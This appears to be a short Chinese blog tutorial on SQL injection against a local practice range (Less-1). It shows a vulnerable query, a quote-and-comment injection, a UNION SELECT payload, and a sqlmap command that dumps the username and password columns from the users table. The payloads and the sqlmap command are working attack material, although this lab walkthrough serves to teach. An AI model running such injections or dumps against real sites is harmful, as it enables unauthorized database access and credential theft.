今天去踏青,看到灵帝说该发帖了,所以再水水
打开我们的靶场,输入id=1 正常显示
我们靶场的源码是$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1″;
我们输入id=1′ –+
就相当于$sql=”SELECT * FROM users WHERE id=’$id’//’ LIMIT 0,1″;
把后面给注释掉了,这样我们就可以执行自己的语句
我们输入
http://192.168.3.133:3366/Less-1/?id=-1′ union select 1,version(),3 –+
//(字段是3,你也可以用order by自己慢慢试)
可以查看到数据库的靶场,当然如果需要也可以执行别的命令,这里不多讲
这时我们可以知道这个网站是存在注入点的,手机手动注入太累了,打开termux
apt install python2
git clone https://gitee.com/wayfeel/sqlmap
这是gitee加速过的,下载速度很快
然后我们cd进sqlmap目录
直接python2 sqlmap.py “http://192.168.3.133:3366/Less-1/?id=1” -D security -T users -C password,username –dump
爆出密码和用户名
更多sqlmap命令https://blog.csdn.net/weixin_45983744/article/details/104002419
这期的小工具是今天踏青时写的,很垃圾,所以不分享啦
© 版权声明
文章资源皆为网络收集,如有侵犯权益,请联系我们删除,谢谢合作,未经允许请勿转载本站文章。
THE END
暂无评论内容